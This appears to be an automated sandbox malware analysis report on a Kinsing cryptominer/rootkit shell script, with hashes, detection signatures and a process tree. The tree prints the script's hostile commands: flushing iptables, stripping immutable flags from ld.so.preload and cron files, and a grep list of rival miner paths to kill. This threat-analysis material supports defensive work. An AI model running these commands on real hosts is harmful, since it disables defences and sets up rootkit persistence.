Analysis
-
max time kernel
110s -
max time network
108s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
23/02/2025, 19:15
Static task
static1
Behavioral task
behavioral1
Sample
ce.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ce.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ce.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ce.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
ce.sh
-
Size
15KB
-
MD5
68a31f9064d9afddc811f23fb0e68842
-
SHA1
aeb5eb09fc6bb8cfeee029d650ffcef81e778cea
-
SHA256
c67153f754687fbc9472a3c3f209a7dd567d95c0ce866ed367a4a58091b7488f
-
SHA512
f1749af0b3584f06da1b013d5da556509969e0572ecb7e37cc9087b050cb21458bfaf6355b1915039b308c45ade3036b3abef330735a504db5cd71bf69d05646
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwP:trgXux7YJDj8OoJwP
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-17.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-16.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload ce.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1713 chmod 1714 chmod 1687 chmod 1689 chmod 1698 chmod 1700 chmod 1705 chmod 1707 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1715 ce.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 723 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1435 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 720 chattr 1468 xargs 1545 xargs 1625 xargs 1637 xargs 1642 xargs 1478 xargs 1551 xargs 1623 sed 717 chattr 1598 xargs 1620 sed 1665 xargs 1592 xargs 1595 xargs 1613 xargs 1654 xargs 1676 xargs 1489 xargs 1499 xargs 1504 xargs 1589 xargs 1599 sed 1601 xargs 1611 sed 1617 sed 710 chattr 1444 uname 1533 xargs 1596 sed 1605 sed 1614 sed 1619 xargs 1622 xargs 1473 xargs 1494 xargs 1521 xargs 1539 xargs 1557 xargs 1602 sed 1604 xargs 1616 xargs 1483 xargs 1526 xargs 1590 sed 1593 sed 1607 xargs 1681 xargs 1509 xargs 1514 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.Mp3Qlq crontab File opened for modification /var/spool/cron/crontabs/tmp.fheKWw crontab File opened for modification /var/spool/cron/crontabs/tmp.bSHIht crontab File opened for modification /var/spool/cron/crontabs/tmp.F2eoD7 crontab File opened for modification /var/spool/cron/crontabs/tmp.uTz0Ej crontab File opened for modification /var/spool/cron/crontabs/tmp.uKb34n crontab File opened for modification /var/spool/cron/crontabs/tmp.ftHup8 crontab File opened for modification /var/spool/cron/crontabs/tmp.UUPYCc crontab File opened for modification /var/spool/cron/crontabs/tmp.nl2zMg crontab File opened for modification /var/spool/cron/crontabs/tmp.rFrBux crontab File opened for modification /var/spool/cron/crontabs/tmp.9UbTBc crontab File opened for modification /var/spool/cron/crontabs/tmp.fPKoMT crontab File opened for modification /var/spool/cron/crontabs/tmp.NLiAiU crontab File opened for modification /var/spool/cron/crontabs/tmp.loPCoU crontab File opened for modification /var/spool/cron/crontabs/tmp.BEBjUg crontab File opened for modification /var/spool/cron/crontabs/tmp.qS1Kei crontab File opened for modification /var/spool/cron/crontabs/tmp.kimanU crontab File opened for modification /var/spool/cron/crontabs/tmp.FMwvT7 crontab File opened for modification /var/spool/cron/crontabs/tmp.7m5NSH crontab File opened for modification /var/spool/cron/crontabs/tmp.7gyB4j crontab File opened for modification /var/spool/cron/crontabs/tmp.8vFo9A crontab File opened for modification /var/spool/cron/crontabs/tmp.pQ3bEF crontab File opened for modification /var/spool/cron/crontabs/tmp.Bzgolm crontab File opened for modification /var/spool/cron/crontabs/tmp.tdvrsY crontab File opened for modification /var/spool/cron/crontabs/tmp.A0hB2F crontab File opened for modification /var/spool/cron/crontabs/tmp.nPdGkO crontab File opened for modification /var/spool/cron/crontabs/tmp.PnNKQg crontab File opened for modification /var/spool/cron/crontabs/tmp.U0ZtXQ crontab File opened for modification /var/spool/cron/crontabs/tmp.1C4aKP crontab File opened for modification /var/spool/cron/crontabs/tmp.MUWLZd crontab File opened for modification /var/spool/cron/crontabs/tmp.wQjXgX crontab File opened for modification /var/spool/cron/crontabs/tmp.0KUsPZ crontab File opened for modification /var/spool/cron/crontabs/tmp.WiJXb8 crontab File opened for modification /var/spool/cron/crontabs/tmp.4FNk6T crontab File opened for modification /var/spool/cron/crontabs/tmp.K0HDB3 crontab File opened for modification /var/spool/cron/crontabs/tmp.xlPqbe crontab File opened for modification /var/spool/cron/crontabs/tmp.jsXQBo crontab File opened for modification /var/spool/cron/crontabs/tmp.1T3qLU crontab File opened for modification /var/spool/cron/crontabs/tmp.ihILR8 crontab File opened for modification /var/spool/cron/crontabs/tmp.c5TkB8 crontab File opened for modification /var/spool/cron/crontabs/tmp.qSLKjN crontab File opened for modification /var/spool/cron/crontabs/tmp.V6kwF2 crontab File opened for modification /var/spool/cron/crontabs/tmp.Kwgg1E crontab File opened for modification /var/spool/cron/crontabs/tmp.mgntbd crontab File opened for modification /var/spool/cron/crontabs/tmp.7mSDZF crontab File opened for modification /var/spool/cron/crontabs/tmp.qYzAzk crontab File opened for modification /var/spool/cron/crontabs/tmp.ySlyGF crontab File opened for modification /var/spool/cron/crontabs/tmp.DPlXpg crontab File opened for modification /var/spool/cron/crontabs/tmp.GKyqia crontab File opened for modification /var/spool/cron/crontabs/tmp.7tgE31 crontab File opened for modification /var/spool/cron/crontabs/tmp.GxgPBq crontab File opened for modification /var/spool/cron/crontabs/tmp.TQwldI crontab File opened for modification /var/spool/cron/crontabs/tmp.rqYeOe crontab File opened for modification /var/spool/cron/crontabs/tmp.vLgzXB crontab File opened for modification /var/spool/cron/crontabs/tmp.V4piLa crontab File opened for modification /var/spool/cron/crontabs/tmp.G4c3er crontab File opened for modification /var/spool/cron/crontabs/tmp.CzoqHL crontab File opened for modification /var/spool/cron/crontabs/tmp.6qHmPH crontab File opened for modification /var/spool/cron/crontabs/tmp.ZfAsV4 crontab File opened for modification /var/spool/cron/crontabs/tmp.TEjOKt crontab File opened for modification /var/spool/cron/crontabs/tmp.uZeFVr crontab File opened for modification /var/spool/cron/crontabs/tmp.Dn1evy crontab File opened for modification /var/spool/cron/crontabs/tmp.byW12t crontab File opened for modification /var/spool/cron/crontabs/tmp.s2PW3U crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service ce.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1485 ps 1500 ps 1517 ps 1522 ps 1585 ps 1638 ps 1677 ps 1490 ps 1495 ps 1505 ps 1510 ps 1633 ps -
description ioc Process File opened for reading /proc/18/status pkill File opened for reading /proc/15/status pkill File opened for reading /proc/150/cmdline pkill File opened for reading /proc/354/cmdline ps File opened for reading /proc/69/stat ps File opened for reading /proc/14/status pkill File opened for reading /proc/11/status pkill File opened for reading /proc/676/status ps File opened for reading /proc/20/status ps File opened for reading /proc/24/stat ps File opened for reading /proc/111/cmdline pkill File opened for reading /proc/11/cmdline pkill File opened for reading /proc/154/cmdline pkill File opened for reading /proc/2/status pkill File opened for reading /proc/tty/drivers ps File opened for reading /proc/filesystems ls File opened for reading /proc/706/status pkill File opened for reading /proc/14/stat ps File opened for reading /proc/filesystems sed File opened for reading /proc/150/status ps File opened for reading /proc/6/cmdline pkill File opened for reading /proc/filesystems crontab File opened for reading /proc/1/stat ps File opened for reading /proc/150/status ps File opened for reading /proc/1492/stat ps File opened for reading /proc/23/cmdline ps File opened for reading /proc/23/status ps File opened for reading /proc/13/status pkill File opened for reading /proc/704/status pkill File opened for reading /proc/320/status pkill File opened for reading /proc/21/status pkill File opened for reading /proc/380/status ps File opened for reading /proc/703/cmdline ps File opened for reading /proc/676/status pkill File opened for reading /proc/704/status pkill File opened for reading /proc/121/status pkill File opened for reading /proc/filesystems ps File opened for reading /proc/677/cmdline pkill File opened for reading /proc/704/status ps File opened for reading /proc/704/cmdline ps File opened for reading /proc/82/cmdline pkill File opened for reading /proc/13/stat ps File opened for reading /proc/1499/status ps File opened for reading /proc/668/status pkill File opened for reading /proc/1521/status ps File opened for reading /proc/69/cmdline pkill File opened for reading /proc/73/status ps File opened for reading /proc/1519/cmdline ps File opened for reading /proc/320/stat ps File opened for reading /proc/704/status pkill File opened for reading /proc/326/cmdline ps File opened for reading /proc/17/cmdline pkill File opened for reading /proc/154/stat ps File opened for reading /proc/1559/cmdline pkill File opened for reading /proc/676/status pkill File opened for reading /proc/20/stat ps File opened for reading /proc/36/cmdline pkill File opened for reading /proc/1649/stat ps File opened for reading /proc/filesystems crontab File opened for reading /proc/14/cmdline ps File opened for reading /proc/705/cmdline pkill File opened for reading /proc/17/stat ps File opened for reading /proc/320/status pkill File opened for reading /proc/150/status ps -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1380 ls 1820 sed
Processes
-
/tmp/ce.sh/tmp/ce.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:706 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:710
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:712
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:717
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:720
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:723
-
-
/bin/grepgrep exe2⤵PID:733
-
-
/bin/lsls -latrh /proc/12⤵PID:732
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:737
-
-
/bin/grepgrep exe2⤵PID:741
-
-
/bin/lsls -latrh /proc/102⤵PID:740
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:744
-
-
/bin/grepgrep exe2⤵PID:748
-
-
/bin/lsls -latrh /proc/112⤵PID:747
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:750
-
-
/bin/grepgrep exe2⤵PID:754
-
-
/bin/lsls -latrh /proc/1112⤵PID:753
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:758
-
-
/bin/grepgrep exe2⤵PID:761
-
-
/bin/lsls -latrh /proc/122⤵PID:760
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:764
-
-
/bin/grepgrep exe2⤵PID:767
-
-
/bin/lsls -latrh /proc/1212⤵PID:766
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:769
-
-
/bin/grepgrep exe2⤵PID:773
-
-
/bin/lsls -latrh /proc/1222⤵PID:772
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:775
-
-
/bin/grepgrep exe2⤵PID:778
-
-
/bin/lsls -latrh /proc/132⤵PID:777
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:780
-
-
/bin/grepgrep exe2⤵PID:783
-
-
/bin/lsls -latrh /proc/142⤵PID:782
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:785
-
-
/bin/grepgrep exe2⤵PID:788
-
-
/bin/lsls -latrh /proc/152⤵PID:787
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:790
-
-
/bin/grepgrep exe2⤵PID:793
-
-
/bin/lsls -latrh /proc/1502⤵PID:792
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:795
-
-
/bin/grepgrep exe2⤵PID:798
-
-
/bin/lsls -latrh /proc/1542⤵PID:797
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:800
-
-
/bin/grepgrep exe2⤵PID:803
-
-
/bin/lsls -latrh /proc/162⤵PID:802
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:805
-
-
/bin/grepgrep exe2⤵PID:808
-
-
/bin/lsls -latrh /proc/172⤵PID:807
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:810
-
-
/bin/grepgrep exe2⤵PID:813
-
-
/bin/lsls -latrh /proc/1702⤵PID:812
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:815
-
-
/bin/grepgrep exe2⤵PID:818
-
-
/bin/lsls -latrh /proc/182⤵PID:817
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:820
-
-
/bin/grepgrep exe2⤵PID:823
-
-
/bin/lsls -latrh /proc/192⤵PID:822
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:825
-
-
/bin/grepgrep exe2⤵PID:828
-
-
/bin/lsls -latrh /proc/22⤵PID:827
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:830
-
-
/bin/grepgrep exe2⤵PID:833
-
-
/bin/lsls -latrh /proc/202⤵PID:832
-
-
